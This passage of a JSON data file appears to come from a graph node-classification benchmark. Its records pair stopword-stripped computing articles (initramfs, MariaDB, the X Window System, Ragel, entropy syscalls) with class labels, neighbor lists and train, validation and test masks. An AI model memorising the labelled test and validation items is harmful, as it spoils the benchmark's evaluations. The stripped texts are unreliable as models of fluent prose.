      4957,
      2786,
      4964,
      8676,
      6120,
      4850,
      2804,
      5492,
      9204,
      6138,
      4859,
      5759
    ],
    "mask": "Train"
  },
  {
    "node_id": 8676,
    "label": 3,
    "text": "Initial_ramdisk:initial ramdisk computing specifically regards linux computing codice_1 initial ramdisk scheme loading temporary root file system memory may used part linux startup process codice_1 codice_3 refer two different methods achieving commonly used make preparations real root file system mounted many linux distributions ship single generic linux kernel image one distribution developers create specifically boot wide variety hardware device drivers generic kernel image included loadable kernel modules statically compiling many drivers one kernel causes kernel image much larger perhaps large boot computers limited memory raises problem detecting loading modules necessary mount root file system boot time matter deducing root file system complicate matters root file system may software raid volume lvm nfs diskless workstations encrypted partition require special preparations mount another complication kernel support hibernation suspends computer disk dumping image entire contents memory swap partition regular file powering next boot image made accessible loaded back memory avoid hardcode handling many special cases kernel initial boot stage temporary root file-system — dubbed early user space — used root file-system contain user-space helpers hardware detection module loading device discovery necessary get real root file-system mounted image initial root file system along kernel image must stored somewhere accessible linux bootloader boot firmware computer root file system boot image optical disc small partition local disk boot partition usually using ext2 fat file systems tftp server systems boot ethernet bootloader load kernel initial root file system image memory start kernel passing memory address image end boot sequence kernel tries determine format image first blocks data lead either initrd initramfs scheme initrd scheme image may file system image optionally compressed made available special block device mounted initial root file system driver file system must compiled statically kernel many distributions originally used compressed ext2 file system images others including debian 3.1 used cramfs order boot memory-limited systems since cramfs image mounted in-place without requiring extra space decompression initial root file system kernel executes first process exits kernel assumes real root file system mounted executes begin normal user-space boot process initramfs scheme available since linux kernel 2.6.13 image may cpio archive optionally compressed archive unpacked kernel special instance tmpfs becomes initial root file system scheme advantage requiring intermediate file system block drivers compiled kernel systems use dracut package create initramfs image initramfs scheme kernel executes first process expected exit.. applications initramfs use casper utility create writable environment using unionfs overlay persistence layer read-only root filesystem image example overlay data stored usb flash drive compressed squashfs read-only image stored live cd acts root filesystem depending algorithms compiled statically kernel unpack initrd/initramfs images compressed gzip bzip2 lzma xz lzo lz4 linux distributions debian generate customized initrd image contains whatever necessary boot particular computer ata scsi filesystem kernel modules typically embed location type root file system linux distributions fedora ubuntu generate generic initrd image start device name root file system uuid must discover everything else boot time case software must perform complex cascade tasks get root file system mounted distributions use event-driven hotplug agent udev invokes helper programs hardware devices disk partitions storage volumes matching certain rules come online allows discovery run parallel progressively cascade arbitrary nestings lvm raid encryption get root file system root file system finally becomes visible maintenance tasks run mounted root file system done root file system mounted read-only processes must continue running splash screen helper command fifo hoisted newly mounted root file system final root file system simply mounted since would make scripts tools initial root file system inaccessible final cleanup tasks initial root file systems implement shell script thus include minimal shell usually /bin/ash along essential user-space utilities usually busybox toolkit save space shell utilities supporting libraries typically compiled space optimizations enabled gcc -os flag linked klibc minimal version c library written specifically purpose installers linux distributions typically run entirely initramfs must able host installer interface supporting tools persistent storage set tiny core linux puppy linux run entirely initrd since windows vista windows boot wim disk image file file format officially published rather similar zip format except supports hard links uses chunk-by-chunk compression support deduplicated chunks case whole wim initially loaded ram followed kernel initialisation next loaded wim available systemroot assigned drive letter windows installer uses boots boot.wim uses install.wim collection windows files installed also windows preinstallation environment windows pe uses base separate-boot versions antivirus backup/disaster recovery software also possible install windows always boot wim vhd file placed physical drive however rarely used since windows boot loader capable loading .sys files boot-time kernel modules task requires initrd linux",
    "neighbors": [
      516,
      4616,
      3082,
      9745,
      5139,
      8214,
      10780,
      10785,
      3618,
      9762,
      6180,
      3109,
      8242,
      9266,
      8248,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      9337,
      5244,
      4734,
      1150,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      9874,
      2195,
      2197,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      7907,
      2278,
      233,
      4841,
      7403,
      8938,
      237,
      10482,
      9972,
      2294,
      8439,
      6393,
      2809,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      10016,
      6436,
      295,
      3382,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      7555,
      900,
      5514,
      4493,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      11179,
      9646,
      1456,
      1972,
      2996,
      9660,
      451,
      9667,
      457,
      5067,
      4561,
      8147,
      3033,
      5596,
      2529,
      6625,
      8675,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8677,
    "label": 9,
    "text": "Ragel:ragel ragel finite-state machine compiler parser generator initially ragel supported output c c++ assembly source code although subsequently extended support several languages said objective c go ruby java support languages withdrawn supports generation table control flow driven state machines regular expressions and/or state charts also build lexical analysers via longest-match method ragel specifically targets text parsing input validation ragel supports generation table control flow driven state machines regular expressions and/or state charts also build lexical analysers via longest-match method unique feature ragel user actions associated arbitrary state machine transitions using operators integrated regular expressions ragel also supports visualization generated machine via graphviz graph represents state-machine takes user input series bytes representing ascii characters control codes 48..57 equivalent regular expression 0-9 i.e digit sequences beginning digit recognised 10 line feed encountered 're done 46 decimal point 43 45 positive negative signs '+ '- 69/101 uppercase/lowercase e indicate number scientific format recognize following properly",
    "neighbors": [
      1952,
      5635,
      7430,
      522,
      5547,
      5165,
      5677,
      6797,
      7983,
      9245,
      5397,
      5399,
      1435,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8678,
    "label": 4,
    "text": "Asset_Disposal_and_Information_Security_Alliance:asset disposal information security alliance asset disposal information security alliance adisa organization recommends standards safely disposing information technology equipment minimizing risk exposure misuse sensitive data stored equipment adisa standards cover phases asset disposal including collection transportation storage erasure destruction components containing data recycling waste disposal certification includes periodic audits founded 2010 adisa publishes separate versions standard asia/pacific european union north america united kingdom adisa asset disposal security standard recognized industry standard merit uk defence infosec product co-operation group dipcog",
    "neighbors": [
      2558,
      11695,
      7579,
      9499,
      6494
    ],
    "mask": "Test"
  },
  {
    "node_id": 8679,
    "label": 3,
    "text": "Entropy-supplying_system_calls:entropy-supplying system calls entropy-supplying system calls system calls unix-like operating system kernels processes obtain entropic random data first codice_1 introduced openbsd operating system release 5.6 november 2014 refactoring sysctl 3 kern_arnd approach used since 1997 linux offers similar system call codice_2 based codice_1 first available linux 3.17 released october 2014 july 2015 solaris introduced slightly modified versions codice_1 codice_2 august 2015 freebsd introduced codice_6 system call obtaining random data kernel system calls allow processes access quality random data without opening reading randomness pseudo-devices microsoft windows codice_7 apple ios codice_8 api similar however implemented system calls traditionally unix-like operating systems supply random data two pseudo-devices codice_9 codice_10 however safely reliably reading random data devices difficult complicated example attacker could interfere process access pseudo-devices opening available file descriptors similar form resource exhaustion attack use devices also interferes privilege revocation unprivileged processes often denied ability open read files devices randomness devices even visible chrooted processes difficulty using randomness pseudo-devices often leads developers use standard library functions instead c programming language codice_11 codice_12 codice_13 unsafe used cryptography similar applications algorithms actually deterministic intentionally crippled satisfy seed-reuse requirements interfaces codice_14 codice_15 codice_16 significant difference exists calls codice_17 guarantees random numbers returned immediately without blocking requires operating support guarantees random data stream initialization earliest opportunity encourage operating systems follow model getentropy indicate errors application calls described may return errors instead block indeterminately blocking semantics implicated significant problems security becomes widespread priority software development quality randomness used often contexts providing quality randomness increasingly considered core responsibility kernel system calls traditional interface process uses core kernel services kernels therefore supporting accessing randomness system calls faster adds another layer entropy mixing usually suggested processes use syscalls data userspace cryptographically secure pseudorandom number generator csprng rather assigning retrieved data directly variables purpose openbsd c standard library includes function codice_18 programs expected call need random data like codice_1 codice_18 also may block return error approach allows program fetch less entropy kernel without reducing strength random data codice_1 system call designed based assumption supplying 256 bytes per call",
    "neighbors": [
      8065,
      6813,
      4423,
      6797,
      174,
      7091,
      2036,
      5397,
      5117
    ],
    "mask": "None"
  },
  {
    "node_id": 8680,
    "label": 9,
    "text": "Intrinsic_function:intrinsic function computer software compiler theory intrinsic function builtin function function subroutine available use given programming language whose implementation handled specially compiler typically may substitute sequence automatically generated instructions original function call similar inline function unlike inline function compiler intimate knowledge intrinsic function thus better integrate optimize given situation compilers implement intrinsic functions generally enable program requests optimization otherwise falling back default implementation provided language runtime system environment intrinsic functions often used explicitly implement vectorization parallelization languages address constructs application programming interfaces api example altivec openmp use intrinsic functions declare respectively vectorizable multiprocessing-aware operations compiling compiler parses intrinsic functions converts vector math multiprocessing object code appropriate target platform compilers c c++ microsoft intel gnu compiler collection gcc implement intrinsics map directly x86 single instruction multiple data simd instructions mmx streaming simd extensions sse sse2 sse3 ssse3 sse4 microsoft visual c++ compiler microsoft visual studio support inline assembly x86-64 compensate new intrinsics added map standard assembly instructions normally accessible c/c++ e.g. bit scan c c++ compilers provide non-portable platform-specific intrinsics intrinsics gnu built-ins slightly abstracted approximating abilities several contemporary platforms portable fall back implementations platforms appropriate instructions common c++ libraries glm sony vector maths libraries achieve portability via conditional compilation based platform specific compiler flags providing fully portable high-level primitives e.g. four-element floating-point vector type mapped onto appropriate low level programming language implementations still benefiting c++ type system inlining hence advantage linking hand-written assembly object files using c application binary interface abi hotspot java virtual machine jvm just-in-time compiler also intrinsics specific java apis hotspot intrinsics standard java apis may one optimized implementation platforms",
    "neighbors": [
      3076,
      1952,
      8609,
      2088,
      8624,
      1203,
      8120,
      7097,
      10620,
      2620,
      8125,
      8126,
      9921,
      8262,
      977,
      5844,
      3413,
      477,
      1378,
      8037,
      9445,
      5356,
      5358,
      5872,
      499,
      9331,
      9587,
      3960,
      4603,
      508,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8681,
    "label": 7,
    "text": "Pando_Networks:pando networks founded 2004 new york city pando networks managed peer-to-peer p2p media distribution company backed intel capital brm capital wheatley partners company specialized cloud distribution games video software publishers media distributors also operated freemium consumer business sending large files pando network technology based bittorrent modifications hybrid p2p- server-based network included central control file distribution intelligent throttling peers servers reporting/analytics security spring 2006 company publicly launched pando small application let consumers bypass email attachment limits send large files 1gb regardless email service provider late may 2009 30 million people installed pando application late 2007 along verizon communications pando networks co-founded p4p “ proactive network provider participation p2p ” working group serve p2p companies internet service providers isps seeing much 70 percent bandwidth go p2p traffic p4p working group includes mix 50 p2p companies isps including telefónica comcast yale computer science research team developed p4p technical protocol believed could speed p2p content delivery lowering isp network utilization collaboration yale p4p working group pando networks adopted technology laird popkin coordinated test summer 2008 showing promising results company released first commercial service may 2008 media distributors could plug pando networks peer cloud existing content delivery networks cdns combination peer cloud plus cdn allows files high demand quickly cost effectively delivered peers long tail content reliably served cdn nbc universal incorporated pando networks ’ technology later year deliver high-definition tv episodes consumers ’ pcs game industry pando networks ’ largest customer segment installation files particularly massively multiplayer online games mmos reach well 1gb pando networks game customers included nexon turbine riot games gala-net levelup may 2010 pando networks surpassed 30 million game downloads pando networks acquired microsoft march 2013",
    "neighbors": [
      10368,
      259,
      4356,
      11524,
      6150,
      6797,
      782,
      1935,
      10900,
      3605,
      11030,
      3224,
      11549,
      7838,
      7456,
      929,
      5666,
      3875,
      7970,
      11559,
      1832,
      6441,
      6827,
      7215,
      3890,
      11060,
      8757,
      7359,
      8640,
      4289,
      194,
      3527,
      9033,
      6476,
      10957,
      4816,
      4051,
      9812,
      11221,
      11605,
      4439,
      11103,
      4704,
      4194,
      10338,
      740,
      2919,
      9448,
      617,
      9585,
      7796,
      6265,
      1916
    ],
    "mask": "Test"
  },
  {
    "node_id": 8682,
    "label": 5,
    "text": "X_Window_System_protocols_and_architecture:x window system protocols architecture computing x window system commonly x11 x network-transparent windowing system bitmap displays article details protocols technical structure x11 x uses client–server model x server program runs computer graphical display communicates various client programs x server acts go-between user client programs accepting requests tcp port 6000 graphical output windows client programs displaying user display receiving user input keyboard mouse transmitting client programs x server runs user computer clients may run remote machines terminology reverses common notion client–server systems client normally runs user local computer server runs remote computer x window terminology takes perspective x window program centre activity i.e x window program accepts responds requests applications user mouse keyboard input therefore applications remote computers viewed clients x window server program communication protocol server client runs network-transparently client server may run machine different ones possibly different architectures operating systems client server communicate securely internet tunneling connection encrypted connection bob scheifler jim gettys set early principles x follows listed scheifler/gettys 1996 first principle modified design x11 add new functionality unless know real application require x largely kept principles since x.org foundation develops reference implementation view extension improvement implementation whilst keeping almost entirely compatible original 1987 protocol communication server clients done exchanging packets network channel client establishes connection sending first packet server answers sending back packet stating acceptance refusal connection request authentication connection accepted acceptance packet contains data client use subsequent interaction server connection established client server exchange four different types packets channel x server provides set basic services client programs realize complex functionalities interacting server graphical user interfaces usually call window top-level window x window system term window also used windows lie within another window subwindows parent window graphical elements buttons menus icons etc realized using windows window created subwindow parent window causes windows arranged hierarchically tree x server automatically creates root tree called root window top-level windows exactly direct subwindows root window visibly root window large screen lies behind windows x server stores data windows fonts etc client knows identifiers objects – integers use names interacting server example client wishes window created requests server create one case success gets return identifier server associated newly created window identifier later used client request example string drawn window identifiers unique server client example two windows identifier even created two different clients client access object given identifier even another client created object every window predefined set attributes set properties stored x server accessible clients via appropriate requests attributes data window size position background color etc properties pieces data attached window unlike attributes properties meaning level x window core protocol client store arbitrary data property window property characterized name type value properties resemble variables imperative programming languages application create new property given name given type store value properties associated windows two properties name exist two different windows different types values properties mostly used inter-client communication example property named codice_1 stores name window window managers typically read property display name window top codice_2 program display properties window particular codice_3 shows properties root window include x resources parameters programs events packets sent server client communicate something happened may interest client client request server send event another client used communication clients example client requests text currently selected event sent client currently handling window holds selection content window may destroyed conditions example window covered whenever area destroyed content made visible server generates codice_4 event notify client part window drawn events serve notify clients keyboard mouse input creation new windows etc kinds events always sent client kinds event sent client previously stated interest clients may interested kind events example client may interested keyboard-related event mouse-related events way x window system handles colors sometimes confuse users historically several different modes supported modern applications use truecolor 24-bit color 8 bits red green blue old specialist applications may require different color mode many commercial specialist applications use pseudocolor x11 protocol actually uses single 32-bit unsigned integer called pixelvalue representing single color graphic operations transferring intensity primary colors 16 bit integer used colour component following representations colors exist may supported specific device client programs communicate server via xlib client library beside xlib xcb library operates closely x protocol particular clients use libraries xaw motif gtk+ qt turn use xlib interacting server qt switched xlib xcb 5.0 release client programs almost entirely unaffected change x window core protocol provides mechanisms communication clients window properties events particular client-to-client message events however specify protocol interactions instead separate set inter-client communication conventions governs protocols inter-client communication conventions manual specifies protocol exchange data via selections interaction applications window manager considered specification difficult confusing consistency application look feel communication typically addressed programming given desktop environment inter-client exchange protocol ice specifies framework building protocols interaction clients programmers build specific protocol top particular x session management protocol xsmp protocol based ice governs interaction applications session manager program takes care storing status desktop end interactive session recovering another session user started freedesktop specifications include newer conventions including drag-and-drop convention xdnd used transferring data selecting dragging another window embedded application convention xembed details application run subwindow another application mechanisms selections cut buffers drag-and-drop x window system allow user transfer data one window another selections cut buffer used typically user selects text data window pastes different window drag-and-drop used user selects something window clicks selection drags another window since two different applications may handle two windows data transfer requires different clients connected x server interact x window core protocol includes types requests events specific selection exchange transfer mainly done using general client-to-client event sending window properties specific selection transfer users transfer data different types clients usually text also pixmap number list objects etc selections drag-and-drop active mechanisms user selects data window client handling window must actively support protocol transferring data application requesting cut buffers contrast provide passive mechanism user selects text content transferred cut buffer remains even application handling window terminates window destroyed window manager program controls general appearance windows graphical elements graphical user interface differences look x window system different installations stem mainly use different window managers different configurations window manager window manager takes care deciding position windows placing decorative border around handling icons handling mouse clicks outside windows “ background ” handling certain keystrokes etc point view x server window manager operates client like client initial position decorative borders around windows handled window manager using following requests window manager uses first request intercept request mapping top-level windows children root window whenever another application requests mapping top-level window server sends event window manager instead window managers reparent window create larger top-level window called frame window reparent original window child graphically corresponds placing original window inside frame window space frame window taken original window used decorative frame around window “ border ” “ title bar ” window manager manages mouse clicks frame window allows example user move resize window clicking dragging border title bar window manager also handles icons related visual elements graphical user interface icons exist level x window core protocol implemented window manager example whenever window “ iconified ” fvwm window manager unmaps window creates window icon name possibly another window icon image meaning handling icons therefore completely decided window manager window managers wm2 implement icons roughly state session “ state desktop ” given time set windows current content precisely set applications managing windows information allow applications restore condition managed windows required program known x session manager saves restores state sessions recognizably using session manager permits user log interactive session find exactly windows state logging work session manager program stores names running applications logout starts login order state applications restored well needed restore content windows applications must able save state execution upon request session manager load back start x window system includes default session manager called codice_5 developers written session managers specific desktop systems example codice_6 default session manager kde program known x display manager shows graphical login prompt x window system generally display manager runs one x servers local computer accepts incoming connections x servers running remote computers local servers started display manager connects present user login screen remote servers started independently display manager connect situation display manager works like graphical telnet server x server connect display manager starts session applications utilize session run computer display manager input output computer x server runs may computer front user remote one x window system ships xdm basic supplied display manager display managers include gdm gnome kdm kde wdm using wings widget set used window maker entrance using architecture used enlightenment v.17 early widget toolkits x included xaw athena widget set 1983 olit open look intrinsics toolkit 1988 xview 1988 motif 1980s tk olit xview function base toolkits sun legacy openwindows desktop environment motif provides base toolkit common desktop environment cde desktop environment used commercial unix systems solaris aix hp-ux solaris 10 includes cde gnome latter preferred desktop environment toolkits developed recently include qt 1991- used kde gtk+ 1997- used gnome wxwidgets 1992- fltk 1998- fox 1997- fpgui 2005-current scheifler gettys designed x server simple extensible much functionality resides extensions protocol protocol level every extension assigned new request/event/error packet types extension features accessed client applications extension libraries adding extensions current x server implementations reportedly difficult due lack modularity server design long-term goal xcb project automate generating client server sides extensions xml protocol descriptions following table provides partial catalog extensions developed sorted roughly recency introduction",
    "neighbors": [
      9223,
      9868,
      7309,
      2706,
      2581,
      1304,
      429,
      2222,
      7983,
      3764,
      9665,
      10051,
      9932,
      592,
      5840,
      11485,
      11112,
      5867,
      1644,
      5492,
      3323,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8683,
    "label": 1,
    "text": "MariaDB:mariadb mariadb community-developed commercially supported fork mysql relational database management system rdbms intended remain free open-source software gnu general public license development led original developers mysql forked due concerns acquisition oracle corporation mariadb intends maintain high compatibility mysql ensuring drop-in replacement capability library binary parity exact matching mysql apis commands includes new storage engine aria alternative myisam intends default transactional non-transactional engine initially used xtradb default storage engine switched back innodb since version 10.2 lead developer michael monty widenius one founders mysql ab founder monty program ab 16 january 2008 mysql ab announced agreed acquired sun microsystems approximately 1 billion acquisition completed 26 february 2008 mariadb named monty younger daughter maria similar mysql named daughter mariadb version numbers follow mysql numbering scheme version 5.5 thus mariadb 5.5 offers mysql 5.5 features exists gap mysql versions 5.1 5.5 mariadb issued 5.2 5.3 point releases since specific new features developed mariadb developers decided major version number change necessary mariadb supported amazon rds service since october 2015 mariadb supported database microsoft azure mariadb api protocol compatible used mysql plus features support native non-blocking operations progress reporting means connectors libraries applications work mysql also work mariadb—whether support native features basis fedora developers replaced mysql mariadb fedora 19 concerns oracle making mysql closed software project openbsd likewise april 2013 dropped mysql mariadb 5.5 december 2012 michael widenius david axmark allan larsson announced formation foundation would oversee development mariadb april 2013 foundation announced appointed simon phipps secretary interim chief executive officer rasmus johansson chairman board andrew katz jeremy zawodny michael widenius board members noting wished create governance model similar used eclipse foundation board appointed eclipse foundation executive director mike milinkovich advisor lead transition skysql corporation ab company formed ex-mysql executives investors oracle bought mysql announced april 2013 merging company monty program ab joining mariadb foundation mariadb foundation appointed widenius cto simon phipps quit 2014 sale mariadb trademark skysql later said quit soon obvious company going allow independent foundation 1 october 2014 skysql corporation ab changed name mariadb corporation ab reflect role main driving force behind development mariadb server biggest support-provider mariadb registered trademark mariadb corporation ab used license mariadb foundation january 2015 september 2018 otto kekäläinen ceo mariadb foundation stepped effectively 1 october year arjen lentz appointed ceo foundation october 2018 resigned december 2018 kaj arnö joined ceo 1 february 2019 eric herman current chairman board mariadb used servicenow dbs bank google mozilla since 2013 wikimedia foundation several linux bsd distributions include mariadb like ubuntu 14.04 lts default mariadb arch linux manjaro debian debian 9 fedora fedora 19 red hat enterprise linux rhel 7 june 2014 centos centos 7 mageia mageia 2 opensuse opensuse 12.3 dartmouth suse linux enterprise server sles 12 openbsd 5.7 freebsd 2013 google tasked one engineers work mariadb foundation group investment companies led intel invested 20 million skysql european investment bank funded mariadb €25 million 2017",
    "neighbors": [
      11392,
      3,
      8195,
      8582,
      5768,
      5900,
      10254,
      10258,
      788,
      10389,
      6166,
      1816,
      10137,
      9243,
      412,
      7453,
      1950,
      9503,
      4388,
      7339,
      10413,
      10286,
      7983,
      9010,
      823,
      5560,
      10681,
      5691,
      6721,
      9665,
      8006,
      9286,
      3784,
      5964,
      5198,
      2512,
      2130,
      7506,
      9687,
      4696,
      9177,
      10459,
      6245,
      7654,
      8295,
      362,
      2413,
      3182,
      7022,
      3188,
      4598,
      5879,
      10873,
      2810,
      2045,
      11135
    ],
    "mask": "Test"
  },
  {
    "node_id": 8684,
    "label": 3,
    "text": "Goldmont_Plus:goldmont plus goldmont plus microarchitecture low-power atom celeron pentium silver branded processors used systems chip socs made intel gemini lake platform 14 nm goldmont plus core officially launched december 11 2017 goldmont plus enhanced 2nd generation out-of-order low-power atom microarchitecture designed entry level desktop notebook computers goldmont plus built 14 nm manufacturing process supports four cores consumer devices includes intel gen9 graphics architecture improvements introduced kaby lake microarchitecture goldmont plus microarchitecture builds success goldmont microarchitecture provides following enhancements list desktop processors follows list mobile processors follows",
    "neighbors": [
      3457,
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      6926,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      5883,
      8231,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      8379,
      2237,
      5309,
      8125,
      8126,
      6339,
      5444,
      9541,
      8523,
      1998,
      2638,
      977,
      466,
      5073,
      5844,
      8795,
      7134,
      1119,
      1122,
      7653,
      1000,
      7657,
      4204,
      5356,
      9582,
      5871,
      10734,
      499,
      8820,
      3317,
      4217,
      10746,
      4603,
      10620,
      5503
    ],
    "mask": "Train"
  },
  {
    "node_id": 8685,
    "label": 5,
    "text": "Galago_(software):galago software galago desktop presence information framework designed transmit presence information programs gives linux desktop ability combine numerous sources information people combine novel ways area rapid progress desktop computing simple example possibilities framework unified 'friends list could conceivably include twitter facebook nearby computers wired wireless network e-mail contacts voip contacts im contacts increasingly internet services sip voice ip allow optional publication presence means wide number channels communication person become possible galago allow choice available one place galago desktop-neutral contains set widgets gtk+ bindings several scripting languages test programs qt widgets planned",
    "neighbors": [
      4902,
      6694,
      2955,
      7309,
      8621,
      7983,
      1842,
      2804,
      8438,
      823,
      3033,
      11322,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 8686,
    "label": 0,
    "text": "IntraText:intratext intratext digital library offers interface meeting formal requirements texts displayed hypertextual way based tablet pc interface linking words text provides concordances word lists statistics links cited works content available creative commons license also offers publishing services enable similar advantages intratext interface applies cognitive ergonomics model based lexical hypertext tablet pc touch screen interface uses set tools methods based hlt human language technologies intratext reading reference search tool used read work browse text hypertext search words phrases simple click pen mouse tablet pc interface allows browse search without keyboard using mouse computer pen touch screen tablet pc ease use accessibility intratext appreciated features intratext structured create make available high quality electronic editions particularly editorial philological linguistics aspects intratext editions published internet intranets distributed cd-rom several ways intratext allows reproduce faithfully scholarly editions complete footnotes even structured several apparatuses philological annotations references one different editions differences author lexicon lexicon authors several languages text finally intratext supports intra- extra-textual links citations extra-textual citations automatically linked cited work made available intratext edition intratext allows create text collections whole hypertext example collected works author corpora etc intratext collection creates browsing system preserves identity collected text author title structure criteria concordance reference unifies concordances intratext collection table contents two levels index works work toc system generates intratext checks text several issues according schema conceived improve content quality representation quality particular",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8687,
    "label": 2,
    "text": "Edos:edos edos operating system based upon ibm original mainframe dos confused unrelated better known dos ibm pc name stood extended enhanced disk operating system 1970 ibm announced ibm/370 product line along new peripherals software products operating systems including dos/vs supplanted dos although ibm rightly focused new products computing world dominated ibm/360 line left lot users nervous investment although couple projects emulating ibm/370 ibm/360 e.g. cfs inc. couple companies took different approach extending then-current limited dos computer software company tcsc took latter approach starting 1972 developed edos extended disk operating system extended number fixed program space partitions 3 6 added support new hardware included features ibm offered separately first version edos released 1972 response announcement ibm dos release 26 last dos release supported system 360 future dos releases would support system 370 machines also made available third party enhancements spooler docs cfs inc. tcsc enhanced edos become edos/vs announced 1977 delivered beta test sites 1978 may 1977 tcsc announced would release edos/vs response ibm release dos/vs release 34 advanced functions-dos/vs edos/vs based ibm dos/vs release 34 provided equivalent functionality ibm advanced functions-dos/vs product unlike ibm offerings edos/vs would run system 360 machines system 370 machines lacking virtual storage hardware non-vs machines whereas ibm offerings supported latest system 370 models vs hardware included tcsc identified parts ibm dos/vs release 34 operating system relied upon system/370-only machine instructions rewrote use instructions supported system/360 tcsc legally able reuse ibm dos/vs release 34 code since ibm intentionally published code without copyright notice made public domain us copyright law time 1981 ncsc announced plans release edos/vse 2.0 based ibm dos/vse release 35 suitable ibm 4300 machines tcsc founded jerry enfield tom steel responsible development marketing respectively company headquarters richmond virginia tcsc expanded canada australia europe 1980 company acquired nixdorf became ncsc products tcsc included extended console econ system enabled display system console using crt terminal ibm 3270 econ available ibm dos dos/vs tcsc edos edos/vs operating systems tcsc licensed datacom/db applied data research adr run edos edos/vs operating systems 1980 nixdorf bought tcsc nixdorf sought continue licensing arrangement adr ncsc went court dispute whether licensing arrangement terminated acquisition adr nixdorf settled court 1981 agreement nixdorf could continue resell adr products 1973 tcsc released remote job entry rje option edos 1975 tcsc released tape management system edos known tms 1983 ncsc announced unix compatibility subsystem ibm mainframes running ibm dos/vs e nixdorf edos/vs edos/vse operating systems known programmer work station/vse-advanced functions pws/vse-af short pws/vse-af based coherent unix clone developed mark williams company",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      1147,
      1804,
      3978,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      5936,
      6706,
      7217,
      11184,
      6837,
      9141,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      1219,
      8388,
      11075,
      4423,
      8136,
      3913,
      5067,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      9335,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      6647,
      2168,
      3323,
      3197,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 8688,
    "label": 0,
    "text": "Mobile_translation:mobile translation mobile translation refers electronic device software application provides audio translation includes handheld electronic device specifically designed audio translation also includes machine translation service software application hand-held devices including mobile telephones pocket pcs pdas mobile translation provides hand-held device users advantage instantaneous non-mediated translation one human language another usually service fee nevertheless significantly smaller human translator charges mobile translation part new range services offered mobile communication users including location positioning gps service e-wallet mobile banking business card/bar-code/text scanning etc relies computer programming sphere computational linguistics device communication means internet connection sms work translation system allowing japanese exchange conversations foreign nationals mobile phones first developed 1999 advanced telecommunications research institute international-interpreting telecommunications research laboratories based kansai science city japan words spoken mobile device translated target language sent voice user mobile phone machine translation software handheld devices featuring translation capabilities user-input text sms email commercially released 2004 transclick patent issued transclick sms email im translation 2006 november 2005 another japanese company nec corporation announced development translation system could loaded mobile phones mobile translation system could recognize 50,000 japanese words 30,000 english words could used simple translations travelling however january 2009 nec corporation officially demonstrated product technological advances within miniaturization computing communication devices made possible usage mobile telephones language learning among early projects spanish study programs included vocabulary practice quizzes word phrase translations soon projects developed using mobile phones teach english japanese university 2005 shifted focus providing vocabulary instruction sms similar program created learning italian australia vocabulary phrases quizzes short sentences sent via sms google translate one highly-utilized translation services see also infoscope handheld device composed digital camera wireless internet access developed ibm almaden research center ili handheld device provide instantaneous audio translation one language another provides translation english japanese chinese one2one prototype rely internet connectivity order function provide audio translation eight languages pixel buds device produced google provide real-time audio translation 40 languages order support machine translation service mobile device needs able communicate external computers servers receive user-input text/speech translate send back user usually done via internet connection wap gprs edge umts wi-fi earlier applications used sms communicate translation server mobile translation confused user-editable talking dictionaries phrase books already widespread available many hand-held devices normally require internet connectivity mobile device mobile translation may include number useful features auxiliary text translation forms basis service user input text using device keyboard also use pre-existing text form email sms messages received user device email/sms translation also possible send translated message optionally containing source text well translation mobile translation applications also offer additional services facilitate translated communication process may transformed human speech computer renders voice native speaker target language record speech send translation server convert text translating device camera printed text road sign restaurant menu page book etc application send translation server apply optical character recognition ocr technology extract text return user editing necessary translate chosen language combination get connected automatically live interpreter recently notable increase number language pairs offered automatic translation mobile devices japanese service providers traditionally offer cross-translation japanese chinese english korean others may offer translation 20 languages 200 language pairs including latin languages speech generation however limited smaller portion including english spanish italian french chinese etc image translation depends ocr languages available portable real-time automated translation one disposal number practical uses advantages advances mobile technology machine translation services helped reduce even eliminate disadvantages mobile translation reduced screen size mobile device one-finger keyboarding many new hand-held devices come equipped qwerty keyboard and/or touch-sensitive screen well handwriting recognition significantly increases typing speed 2006 new mobile phones devices began featuring large screens greater resolutions 640 x 480 px 854 x 480 px even 1024 x 480 px gives user enough visible space read/write large texts 2011 so-called hybrid translation technology introduced mylanguage mobile app vocre relies large part crowd-sourced language data however important challenge facing mobile translation industry linguistic communicative quality translations although providers claim achieved accuracy high 95 boasting proprietary technology capable “ understanding ” idioms slang language machine translation still distinctly lower quality human translation used care matters translated require correctness disadvantage needs mentioning requirement stable internet connection user mobile device since sms method communicating translation server proved less efficient sending packets data – message length limit 160 characters higher cost sms compared internet traffic charges – internet connectivity mobile devices must coverage non-urban areas still unstable",
    "neighbors": [
      5122,
      2054,
      2440,
      11529,
      2059,
      3085,
      6798,
      11538,
      1044,
      2582,
      5399,
      538,
      7599,
      4531,
      4662,
      3127,
      2488,
      10557,
      3646,
      6208,
      8514,
      3533,
